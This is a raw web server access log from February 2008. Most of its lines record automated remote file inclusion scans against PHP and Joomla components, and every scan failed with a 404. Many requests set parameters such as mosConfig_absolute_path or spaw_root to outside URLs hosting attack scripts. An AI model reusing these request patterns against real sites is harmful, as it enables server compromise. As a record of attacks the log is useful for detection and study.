83.138.141.146 - - [10/Feb/2008:18:16:55 -0800] "GET /logs/access_070709.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:18:16:55 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:18:17:04 -0800] "GET /logs/access_070806.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:18:17:04 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:18:17:04 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.224.20 - - [10/Feb/2008:18:22:47 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://evilscroll.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.186.169.183 - - [10/Feb/2008:18:24:38 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.169.183 - - [10/Feb/2008:18:24:38 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.30.215.76 - - [10/Feb/2008:18:32:24 -0800] "GET /logs/access_070716.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.106.131.26 - - [10/Feb/2008:18:38:55 -0800] "GET /logs/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
87.106.131.26 - - [10/Feb/2008:18:38:55 -0800] "GET /index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
83.172.150.28 - - [10/Feb/2008:18:52:25 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_admin&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "galf.org"
83.172.150.28 - - [10/Feb/2008:18:52:25 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_admin&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "galf.org"
193.252.3.200 - - [10/Feb/2008:18:53:49 -0800] "GET /logs/access_070806.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.246.76.132 - - [10/Feb/2008:18:55:03 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.76.132 - - [10/Feb/2008:18:55:03 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.64.197.10 - - [10/Feb/2008:19:02:52 -0800] "GET /logs/includes/login.php?_SESSION[docroot_path]=http://vps.istri.info/~vpsistri/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.64.197.10 - - [10/Feb/2008:19:02:52 -0800] "GET /includes/login.php?_SESSION[docroot_path]=http://vps.istri.info/~vpsistri/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:19:03:28 -0800] "GET /logs/access_070709.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:19:03:28 -0800] "GET /logs/access_070709.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:19:03:28 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:19:03:28 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:19:03:28 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:19:03:28 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.152.104 - - [10/Feb/2008:19:04:00 -0800] "GET /index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.152.104 - - [10/Feb/2008:19:04:04 -0800] "GET /index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.218.85.18 - - [10/Feb/2008:19:06:44 -0800] "GET /logs/access_070806.log//include.php?path[docroot]=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [10/Feb/2008:19:06:44 -0800] "GET //include.php?path[docroot]=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [10/Feb/2008:19:06:45 -0800] "GET /logs//include.php?path[docroot]=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:19:09:32 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:19:09:32 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:19:09:33 -0800] "GET /logs/access_070806.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.186.169.183 - - [10/Feb/2008:19:10:21 -0800] "GET /logs/access_070806.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
77.232.68.17 - - [10/Feb/2008:19:11:06 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.17 - - [10/Feb/2008:19:11:06 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.225.230.57 - - [10/Feb/2008:19:11:15 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.230.57 - - [10/Feb/2008:19:11:15 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.252.3.200 - - [10/Feb/2008:19:11:19 -0800] "GET /logs/access_070709.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.186.169.183 - - [10/Feb/2008:19:11:27 -0800] "GET /logs/access_070709.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.20.38.186 - - [10/Feb/2008:19:11:54 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.members.lycos.co.uk/hak4live/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
64.20.38.186 - - [10/Feb/2008:19:11:54 -0800] "GET /logs/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.members.lycos.co.uk/hak4live/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:19:16:50 -0800] "GET /logs/access_070709.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.66 - - [10/Feb/2008:19:19:24 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.152.104 - - [10/Feb/2008:19:19:32 -0800] "GET /logs/access_070806.log/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.152.104 - - [10/Feb/2008:19:19:32 -0800] "GET /logs/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.152.104 - - [10/Feb/2008:19:19:37 -0800] "GET /logs/access_070806.log/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.152.104 - - [10/Feb/2008:19:19:37 -0800] "GET /logs/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.218.85.18 - - [10/Feb/2008:19:19:56 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [10/Feb/2008:19:19:56 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.194.67.140 - - [10/Feb/2008:19:20:22 -0800] "GET /logs/index2.php?x=http://www.appleman.com.tw/pub/image/site/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.194.67.140 - - [10/Feb/2008:19:20:22 -0800] "GET /index2.php?x=http://www.appleman.com.tw/pub/image/site/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
222.255.3.68 - - [10/Feb/2008:19:20:23 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
222.255.3.68 - - [10/Feb/2008:19:20:24 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.224.20 - - [10/Feb/2008:19:20:33 -0800] "GET /logs/index2.php?x=http://evilscroll.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.224.20 - - [10/Feb/2008:19:20:33 -0800] "GET /index2.php?x=http://evilscroll.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
222.255.3.68 - - [10/Feb/2008:19:21:05 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
222.255.3.68 - - [10/Feb/2008:19:21:06 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.8.154.216 - - [10/Feb/2008:19:22:16 -0800] "GET /logs/index.php?url=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "galf.org"
213.8.154.216 - - [10/Feb/2008:19:22:16 -0800] "GET /index.php?url=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "galf.org"
89.218.85.18 - - [10/Feb/2008:19:22:34 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [10/Feb/2008:19:22:35 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.9.152.104 - - [10/Feb/2008:19:23:25 -0800] "GET /logs/access_070709.log/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.152.104 - - [10/Feb/2008:19:23:28 -0800] "GET /logs/access_070709.log/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.66 - - [10/Feb/2008:19:24:33 -0800] "GET /logs/access_070709.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.66 - - [10/Feb/2008:19:24:33 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.195.44.108 - - [10/Feb/2008:19:25:06 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.44.87 - - [10/Feb/2008:19:25:07 -0800] "GET /logs/access_070716.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.20.38.186 - - [10/Feb/2008:19:26:30 -0800] "GET //config.inc.php?path_escape=http://www.members.lycos.co.uk/hak4live/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
64.20.38.186 - - [10/Feb/2008:19:26:30 -0800] "GET /logs//config.inc.php?path_escape=http://www.members.lycos.co.uk/hak4live/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
89.108.66.182 - - [10/Feb/2008:19:29:19 -0800] "GET /index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.19.110 - - [10/Feb/2008:19:36:52 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
74.6.24.112 - - [10/Feb/2008:19:36:52 -0800] "GET /labia/?D=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
64.20.38.186 - - [10/Feb/2008:19:38:08 -0800] "GET //config.inc.php?path_escape=http://www.members.lycos.co.uk/hak4live/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "galf.org"
64.20.38.186 - - [10/Feb/2008:19:38:08 -0800] "GET /logs//config.inc.php?path_escape=http://www.members.lycos.co.uk/hak4live/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "galf.org"
68.149.224.227 - - [10/Feb/2008:19:40:23 -0800] "GET /logs/components/com_extcalendar/admin_events.php?http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.149.224.227 - - [10/Feb/2008:19:40:27 -0800] "GET /components/com_extcalendar/admin_events.php?http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.68.175.66 - - [10/Feb/2008:19:46:19 -0800] "GET /index.php?go=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
208.68.175.66 - - [10/Feb/2008:19:46:20 -0800] "GET /logs/index.php?go=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
89.108.66.182 - - [10/Feb/2008:19:47:11 -0800] "GET /logs/access_070806.log/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.66.182 - - [10/Feb/2008:19:47:11 -0800] "GET /logs/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.66.182 - - [10/Feb/2008:19:50:14 -0800] "GET /logs/access_070709.log/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.68.175.66 - - [10/Feb/2008:19:55:04 -0800] "GET /convert/mvcw.php?vwar_root=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "galf.org"
208.68.175.66 - - [10/Feb/2008:19:55:04 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "galf.org"
211.115.89.60 - - [10/Feb/2008:19:57:37 -0800] "GET /logs/access_070709.log//magazine.php?inc=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.115.89.60 - - [10/Feb/2008:19:57:45 -0800] "GET /logs/access_070709.log//content.php?inc=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.115.89.60 - - [10/Feb/2008:19:57:45 -0800] "GET //magazine.php?inc=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.115.89.60 - - [10/Feb/2008:19:57:54 -0800] "GET //content.php?inc=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.115.89.60 - - [10/Feb/2008:19:57:55 -0800] "GET /logs//magazine.php?inc=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.24.137 - - [10/Feb/2008:19:57:55 -0800] "GET /logs/access_071210.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
211.115.89.60 - - [10/Feb/2008:19:58:03 -0800] "GET /logs//content.php?inc=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.131.26 - - [10/Feb/2008:19:59:12 -0800] "GET /index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
87.106.131.26 - - [10/Feb/2008:19:59:12 -0800] "GET /logs/index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
209.195.7.19 - - [10/Feb/2008:20:03:06 -0800] "GET /logs/access_070806.log/index.php?pag=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.195.7.19 - - [10/Feb/2008:20:03:06 -0800] "GET /index.php?pag=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.195.7.19 - - [10/Feb/2008:20:03:06 -0800] "GET /logs/index.php?pag=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.195.7.19 - - [10/Feb/2008:20:05:09 -0800] "GET /logs/access_070806.log/index.php?go=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.195.7.19 - - [10/Feb/2008:20:05:09 -0800] "GET /index.php?go=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.195.7.19 - - [10/Feb/2008:20:05:10 -0800] "GET /logs/index.php?go=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.195.7.19 - - [10/Feb/2008:20:11:18 -0800] "GET /logs/access.log/main.php?x=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
209.195.7.19 - - [10/Feb/2008:20:11:19 -0800] "GET /main.php?x=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
209.195.7.19 - - [10/Feb/2008:20:11:19 -0800] "GET /logs/main.php?x=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
216.246.76.132 - - [10/Feb/2008:20:16:27 -0800] "GET /logs/access_070709.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.115.89.60 - - [10/Feb/2008:20:30:47 -0800] "GET /logs/access_070806.log//content.php?inc=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.115.89.60 - - [10/Feb/2008:20:30:55 -0800] "GET /logs/access_070806.log//magazine.php?inc=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.149.224.227 - - [10/Feb/2008:20:31:43 -0800] "GET /logs/access_070709.log/components/com_extcalendar/admin_events.php?http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.149.224.227 - - [10/Feb/2008:20:31:47 -0800] "GET /components/com_extcalendar/admin_events.php?http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.149.224.227 - - [10/Feb/2008:20:31:51 -0800] "GET /logs/components/com_extcalendar/admin_events.php?http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.252.3.200 - - [10/Feb/2008:20:42:21 -0800] "GET /logs/access_070709.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.252.3.200 - - [10/Feb/2008:20:42:22 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
